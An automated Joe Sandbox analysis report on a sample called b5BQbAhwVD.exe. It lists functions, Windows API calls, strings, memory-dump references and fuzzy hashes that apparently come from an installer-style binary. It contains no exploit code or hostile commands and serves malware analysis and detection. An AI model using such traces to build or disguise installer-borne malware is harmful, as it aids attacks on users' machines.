Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A

Function 0040451E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
GetDlgItem.USER32(?,000003E8), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,000003E8), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D

Strings

Call, xrefs: 004046FB
N, xrefs: 004046BA

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\b5BQbAhwVD.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Strings

[Rename], xrefs: 0040611D, 0040612F
%ls=%ls, xrefs: 004060A9

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 0040667C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

Strings

*?|<>/":, xrefs: 004066CE
"C:\Users\user\Desktop\b5BQbAhwVD.exe", xrefs: 0040667C
C:\Users\user\AppData\Local\Temp\, xrefs: 0040667D, 00406682

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3941435272
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(0001E391,00000064,0001E212), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 72ED161D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,72ED21EC,?,00000808), ref: 72ED1635
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,72ED21EC,?,00000808), ref: 72ED163C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,72ED21EC,?,00000808), ref: 72ED1650
GetProcAddress.KERNEL32(!r,00000000), ref: 72ED1657
GlobalFree.KERNEL32(00000000), ref: 72ED1660

Strings

!r, xrefs: 72ED1653

Memory Dump Source

Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true

Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID: !r
API String ID: 1148316912-476379476
Opcode ID: 6c11ee362aa9f05b4bbfd8b9bfb0cb3ce8b1fd91291e773658c60d3911fe2ee2
Instruction ID: f9b66e48466b40c4360e285f4e12943f57d09ebce24cc1f06d3f511996172887
Opcode Fuzzy Hash: 6c11ee362aa9f05b4bbfd8b9bfb0cb3ce8b1fd91291e773658c60d3911fe2ee2
Instruction Fuzzy Hash: 30F08C732061387BC62016A79C4CD9BBE9CDF8B2F5B610655F228E21D086214C01CBF2

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

unpacking data: %d%%, xrefs: 00402E33, 00402E43
verifying installer: %d%%, xrefs: 00402E3A

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 72ED2569 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 72ED121B: GlobalAlloc.KERNELBASE(00000040,?,72ED123B,?,72ED12DF,00000019,72ED11BE,-000000A0), ref: 72ED1225

GlobalFree.KERNEL32(?), ref: 72ED2657
GlobalFree.KERNEL32(00000000), ref: 72ED268C

Memory Dump Source

Source File: 00000000.00000002.2418368040.0000000072ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 72ED0000, based on PE: true

Associated: 00000000.00000002.2418325538.0000000072ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418407102.0000000072ED4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2418444245.0000000072ED6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72ed0000_b5BQbAhwVD.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 01dde373c5061e9ca861c49dde279aa8101f33b9f8f0f9c5c5df1a0ac69065ed
Instruction ID: fe0da2d898b6c836081a683fcd337f69c8f2311f5617d0b73c3fbea878936754
Opcode Fuzzy Hash: 01dde373c5061e9ca861c49dde279aa8101f33b9f8f0f9c5c5df1a0ac69065ed
Instruction Fuzzy Hash: DA31333A508201DFCB168F69E894E2E7BBAFB853043A0C96DF152C7161C7319C97DB62

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
